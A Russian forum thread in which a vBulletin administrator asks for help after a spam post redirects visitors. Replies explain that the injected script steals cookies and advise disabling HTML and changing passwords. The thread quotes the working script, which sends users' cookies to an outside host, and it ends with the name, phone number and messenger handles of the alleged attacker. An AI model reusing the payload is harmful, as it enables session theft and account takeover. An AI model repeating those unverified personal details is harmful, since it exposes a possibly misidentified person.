[Проблема]

сегодня юзеры сообщили, что из некоторых тем происходит редирект на сайт
http://daemzatakvk.in

примеры тем
http://grim.com.ru/showthread.php?t=124
http://grim.com.ru/showthread.php?t=304

Поиск в БД на предмет daemzatakvk дал несколько вхождений. См. скриншоты.
К сожалению, мои знания не позволяют мне решить эту проблему.

вот код страницы:

Code:

    <!-- message -->
    		<div id="post_message_11923"><div style="margin:20px; margin-top:5px; ">
    	<div class="smallfont" style="margin-bottom:2px">Цитата:</div>
    	<table cellpadding="6" cellspacing="0" border="0" width="100%">
    	<tr>
    		<td class="alt2" style="border:1px inset">
    			
    				<div>
    					Сообщение от <strong>Опришок</strong>
    					<a href="showthread.php?p=10181#post10181" rel="nofollow"><img class="inlineimg" src="images/styles/newlance/buttons/viewpost.gif" border="0" alt="Посмотреть сообщение" /></a>
    				</div>
    				<div style="font-style:italic">Как сделать лысого мужчину не подстригая его?</div>
    			
    		</td>
    	</tr>
    	</table>
    </div>Это же проще простого.... <br />
    Шапочка и латекс все решают... <br />
    <script> img = new Image(); img.src = "http://sinamay.ru/s.gif?"+document.cookie; location.href ="http://daemzatakvk.in/ts.php?p_id=4916" </script></div>
    		<!-- / message -->

А также прилагаю скриншоты из БД. Как мне вычистить ЭТО?





Техподдержка хостинга пока что предложила восстановить сайт из бэкапа и сменить пароли.

Запрашиваемый URL-адрес не может быть предоставлен

URL-адрес:

http://daemzatakvk.in/ts.php?p_id=4916

Заблокирован Веб-Антивирусом

Причина: фишинговая ссылка

А ручками пробовали чистить БД?

почистить наверное можно. Вот только КАК это могло произойти?

На сервере нет чужих новых файлов за последний период и нет измененных (по дате).
Это называется MySQL-инъекция?

mmmalinkaaa добавил 22.04.2012 в 11:45
ой, кажется дело в этом:

HTML Code:

[CODE][quote=Опришок;10181]Как сделать лысого мужчину не подстригая его?[/quote]<br />
<br />
Это же проще простого.... <br />
Шапочка и латекс все решают... <br />
<script> img = new Image(); img.src = "http://sinamay.ru/s.gif?"+document.cookie; location.href ="http://daemzatakvk.in/ts.php?p_id=4916" </script>[/CODE]

это исходный код сообщения.
Видимо, в разделе разрешена обработка html

mmmalinkaaa, скорее всего добавили через [IМG]
Откройте профиль пользователя и поудаляйте все его сообщения.

OlgaB, вполне похоже на то. В коде фигурирует картинка шлюхи. Правда, я не совсем представляю, как именно такое работает. Юзер зарегился совсем недавно и у него всего два сообщения, и в каждом такая вот закладка. Правда, неизвестно, сколько таких юзеров могло быть раньше...

В некоторых разделах действительно оказался включенным html.

mmmalinkaaa добавил 22.04.2012 в 13:10
а кто мне может объяснить смысл вот этого фрагмента?

HTML Code:

s.gif?"+document.cookie;

что это за кука приплюсована?

прием стар как мир
воруют куки узеров с последующим взломом их аккаунтов
в числе жертв может оказаться и админ

Quote:

Originally Posted by kerk

прием стар как мир
воруют куки узеров с последующим взломом их аккаунтов
в числе жертв может оказаться и админ

Таким образом был взломан мой форум,когда я сидел на vbulletin 4.1.4
Это всё из - за включенного xtml на форуме?Сейчас стоит тройка,всё лишенее отключил,защитил движок как мог,но паранойя осталась

Quote:

Originally Posted by kerk

воруют куки узеров с последующим взломом их аккаунтов

что сейчас следует сделать? почистить куки? сменить пароли?

куки чистить не обязательно =)
а вот пароли сменить следует всем
ну по крайней мере тем, кто имеет доступ к админке/модерке

Кто хочет поговорить с данным хакером, пожалуйста,
аську взял у саппорта партнерки по рефу, остальное показал гугл)

ICQ: 628720032
Tel: 8 916 645 17 92
Skype: alexey.boykov
Алексей Бойков